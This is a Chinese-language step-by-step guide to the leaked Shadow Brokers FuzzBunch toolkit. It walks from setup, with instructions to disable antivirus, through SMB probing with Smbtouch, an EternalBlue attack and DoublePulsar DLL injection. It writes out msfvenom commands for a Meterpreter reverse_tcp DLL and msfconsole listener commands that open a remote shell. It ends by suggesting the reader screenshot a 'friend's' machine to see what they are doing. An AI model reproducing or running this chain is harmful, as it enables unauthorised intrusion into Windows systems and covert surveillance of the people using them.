Shadowbroker工具使用方法

运行环境准备

  1. 安装Python2.6和pywin32,注意Python2.6必须为32位版本;
  2. 在windows利用工具目录下创建listeningposts目录;
  3. 使用Python2.6运行fb.py;

注意事项

多使用help命令查看帮助;
工具使用期间,关闭本机的杀毒软件。

运行

FuzzBunch框架的执行,首先需要配置各个全局变量:

  • 目标ip地址;
  • 本机ip地址;
  • 指示转发选项是否将被使用;
  • 指定log日志目录;
  • 选择或者创建项目;

    配置完成之后,进入fb框架,使用help查看帮助命令:

    use命令的用途是选择插件,如下图所示:

    插件被分为如下几类:
    Exploit,渗透攻击插件:

    Touch,目标识别插件:

    Payload,攻击载荷插件:

    还有几类插件未列出。

目标系统漏洞探测

使用Smbtouch插件,使用smb协议来检测对方操作系统版本、架构和可利用的漏洞。
fb > use Smbtouch 使用插件
fb Touch (Smbtouch) > execute 执行插件



攻击

使用Eternalblue插件:
fb Touch (Smbtouch) > use Eternalblue
确定相关的变量,目标ip、端口等:


攻击成功之后会在系统安装一个BackDoor,光有一个后面还不能执行系统命令,需要配合另一个插件。

后渗透攻击

攻击成功之后就可以开始使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能,使用该插件ping功能探测目标系统版本:


准备注入dll payload:

使用kali生成dll木马:
X64:

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=8089 -f dll > /root/Desktop/1.dll

X86:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=8089 -f dll > /root/Desktop/1.dll


Kali端开启监听:

1
2
3
4
5
6
7
$ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.1.114
msf > set LPORT 8089
msf > set PAYLOAD windows/meterpreter/reverse_tcp
(msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp)
msf > exploit

将dll拷贝到攻击机,使用fb.py加载,执行成功之后,kali中会得到一个meterpreter。

截屏,看看朋友在做什么: